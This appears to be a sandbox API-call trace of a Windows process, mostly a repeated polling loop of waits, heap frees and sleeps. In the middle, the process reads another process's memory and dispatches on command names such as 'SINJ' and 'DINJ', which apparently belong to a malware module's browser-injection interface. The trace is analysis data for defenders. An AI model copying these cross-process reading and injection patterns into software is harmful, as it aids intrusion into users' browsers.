	[0236.310] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0236.310] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0236.310] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0236.310] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0236.310] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0508) returned 1
	[0236.310] Sleep (dwMilliseconds=0xbb8) 
	[0236.325] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0236.325] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0236.325] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0236.325] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0236.325] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0236.325] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0508) returned 1
	[0236.326] Sleep (dwMilliseconds=0xbb8) 
	[0236.341] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0236.341] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0236.341] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0236.341] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0236.341] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0236.341] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0508) returned 1
	[0236.341] Sleep (dwMilliseconds=0xbb8) 
	[0236.357] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0236.357] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0236.357] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0236.357] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0236.357] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0236.357] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0508) returned 1
	[0236.357] Sleep (dwMilliseconds=0xbb8) 
	[0236.384] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0236.384] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0236.384] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0236.384] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0236.384] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0236.384] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0508) returned 1
	[0236.384] Sleep (dwMilliseconds=0xbb8) 
	[0236.387] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0236.387] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0236.387] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0236.387] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0236.387] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0236.388] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0508) returned 1
	[0236.388] Sleep (dwMilliseconds=0xbb8) 
	[0236.403] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0236.403] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0236.403] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0236.403] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0236.403] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0236.403] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0508) returned 1
	[0236.404] Sleep (dwMilliseconds=0xbb8) 
	[0236.419] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0236.419] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0236.419] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0236.419] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0236.419] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0236.419] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0508) returned 1
	[0236.419] Sleep (dwMilliseconds=0xbb8) 
	[0236.435] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0236.435] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0236.435] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0236.435] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0236.435] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0236.435] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0508) returned 1
	[0236.435] Sleep (dwMilliseconds=0xbb8) 
	[0236.451] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0236.451] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0236.451] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0236.451] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0236.451] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0236.451] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0508) returned 1
	[0236.451] Sleep (dwMilliseconds=0xbb8) 
	[0236.467] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0236.467] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0236.467] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0236.467] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0236.467] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0236.468] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0508) returned 1
	[0236.468] Sleep (dwMilliseconds=0xbb8) 
	[0236.484] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0236.484] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0236.484] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0236.484] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0236.484] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0236.484] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0508) returned 1
	[0236.485] Sleep (dwMilliseconds=0xbb8) 
	[0236.498] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0236.498] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0236.498] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0236.498] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0236.498] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0236.498] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0508) returned 1
	[0236.498] Sleep (dwMilliseconds=0xbb8) 
	[0236.559] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0236.559] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0236.559] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0236.559] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0236.559] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0236.559] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0508) returned 1
	[0236.560] Sleep (dwMilliseconds=0xbb8) 
	[0236.606] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x102
	[0236.606] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225fc8
	[0236.606] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x400) returned 0x2800998
	[0236.607] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x2260d8
	[0236.607] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60034, lpBuffer=0x248fe34, nSize=0x1c, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x248fe34*, lpNumberOfBytesRead=0x248fe0c*=0x1c) returned 1
	[0236.607] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10064c1c, lpBuffer=0x225fc8, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225fc8*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0236.607] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225fc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5
	[0236.607] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1720
	[0236.607] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225fc8, cbMultiByte=-1, lpWideCharStr=0x27e1720, cchWideChar=5 | out: lpWideCharStr="PING") returned 5
	[0236.607] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xf8fe60, lpBuffer=0x2800998, nSize=0x3ff, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x2800998, lpNumberOfBytesRead=0x248fe0c) returned 0
	[0236.607] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xf8fe38, lpBuffer=0x2260d8, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x2260d8*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0236.607] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2260d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8
	[0236.607] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0530
	[0236.607] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2260d8, cbMultiByte=-1, lpWideCharStr=0x27c0530, cchWideChar=8 | out: lpWideCharStr="browser") returned 8
	[0236.607] SetEvent (hEvent=0x474) returned 1
	[0236.607] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225fc8) returned 1
	[0236.607] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2800998) returned 1
	[0236.607] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2260d8) returned 1
	[0236.607] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0558
	[0236.607] lstrcmpiW (lpString1="PING", lpString2="ModuleQuery") returned 1
	[0236.607] lstrcmpiW (lpString1="PING", lpString2="WantRelease") returned -1
	[0236.607] lstrcmpiW (lpString1="PING", lpString2="VERS") returned -1
	[0236.607] lstrcmpiW (lpString1="PING", lpString2="SINJ") returned -1
	[0236.607] lstrcmpiW (lpString1="PING", lpString2="DINJ") returned 1
	[0236.607] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1738
	[0236.607] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xd730f0, lpParameter=0x27c0508, dwCreationFlags=0x0, lpThreadId=0x248ff58 | out: lpThreadId=0x248ff58*=0xbe8) returned 0x648
	[0236.608] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0580
	[0236.608] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0236.608] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0236.608] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0236.608] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0236.608] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0580) returned 1
	[0236.608] Sleep (dwMilliseconds=0xbb8) 
	[0236.622] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0236.622] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0236.622] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0236.622] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0236.622] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0236.622] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0580) returned 1
	[0236.622] Sleep (dwMilliseconds=0xbb8) 
	[0236.637] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0236.637] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0236.637] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0236.637] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0236.638] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0236.638] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0580) returned 1
	[0236.638] Sleep (dwMilliseconds=0xbb8) 
	[0236.653] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0236.653] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0236.653] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0236.653] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0236.653] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0236.653] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0788) returned 1
	[0236.653] Sleep (dwMilliseconds=0xbb8) 
	[0236.669] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0236.669] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0236.669] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0236.669] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0236.669] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0236.669] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0788) returned 1
	[0236.669] Sleep (dwMilliseconds=0xbb8) 
	[0236.684] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0236.684] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0236.684] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0236.684] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0236.684] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0236.684] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0788) returned 1
	[0236.684] Sleep (dwMilliseconds=0xbb8) 
	[0236.700] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0236.700] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0236.700] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0236.700] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0236.700] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0236.700] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0788) returned 1
	[0236.700] Sleep (dwMilliseconds=0xbb8) 
	[0236.715] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0236.715] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0236.715] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0236.715] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0236.715] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0236.715] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0788) returned 1
	[0236.715] Sleep (dwMilliseconds=0xbb8) 
	[0236.731] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0236.731] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0236.731] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0236.731] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0236.731] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0236.731] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf680) returned 1
	[0236.731] Sleep (dwMilliseconds=0xbb8) 
	[0236.746] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0236.747] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0236.747] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0236.747] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0236.747] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0236.747] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf680) returned 1
	[0236.747] Sleep (dwMilliseconds=0xbb8) 
	[0236.762] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0236.763] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0236.763] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0236.763] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0236.763] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0236.763] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf680) returned 1
	[0236.763] Sleep (dwMilliseconds=0xbb8) 
	[0236.778] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0236.778] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0236.778] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0236.778] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0236.778] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0236.778] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf680) returned 1
	[0236.778] Sleep (dwMilliseconds=0xbb8) 
	[0236.794] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0236.794] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0236.794] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0236.794] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0236.794] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0236.794] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf680) returned 1
	[0236.794] Sleep (dwMilliseconds=0xbb8) 
	[0236.809] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0236.809] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0236.809] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0236.809] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0236.809] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0236.809] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf680) returned 1
	[0236.810] Sleep (dwMilliseconds=0xbb8) 
	[0236.834] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0236.834] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0236.834] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0236.834] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0236.834] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0236.834] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf680) returned 1
	[0236.834] Sleep (dwMilliseconds=0xbb8) 
	[0236.840] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0236.840] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0236.840] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0236.840] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0236.840] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0236.840] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf680) returned 1
	[0236.840] Sleep (dwMilliseconds=0xbb8) 
	[0236.856] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0236.856] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0236.856] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0236.857] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0236.857] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0236.857] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf680) returned 1
	[0236.857] Sleep (dwMilliseconds=0xbb8) 
	[0236.872] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0236.872] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0236.872] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0236.872] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0236.872] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0236.872] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf680) returned 1
	[0236.872] Sleep (dwMilliseconds=0xbb8) 
	[0236.887] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0236.887] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0236.887] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0236.887] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0236.887] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0236.887] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf680) returned 1
	[0236.887] Sleep (dwMilliseconds=0xbb8) 
	[0236.902] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0236.902] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0236.902] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0236.903] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0236.903] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0236.903] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf680) returned 1
	[0236.903] Sleep (dwMilliseconds=0xbb8) 
	[0236.919] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0236.919] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0236.919] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0236.919] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0236.920] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0236.920] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf680) returned 1
	[0236.920] Sleep (dwMilliseconds=0xbb8) 
	[0236.936] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0236.936] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0236.936] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0236.936] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0236.936] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0236.936] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf680) returned 1
	[0236.936] Sleep (dwMilliseconds=0xbb8) 
	[0236.949] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0236.949] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0236.949] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0236.949] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0236.949] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0236.950] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf680) returned 1
	[0236.950] Sleep (dwMilliseconds=0xbb8) 
	[0236.965] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0236.965] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0236.965] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0236.965] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0236.965] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0236.965] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf680) returned 1
	[0236.965] Sleep (dwMilliseconds=0xbb8) 
	[0236.981] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0236.981] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0236.981] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0236.981] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0236.981] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0236.981] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf680) returned 1
	[0236.981] Sleep (dwMilliseconds=0xbb8) 
	[0236.996] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0236.996] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0236.996] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0236.997] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0236.997] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0236.997] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf680) returned 1
	[0236.997] Sleep (dwMilliseconds=0xbb8) 
	[0237.015] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0237.016] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0237.016] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0237.029] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0237.029] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
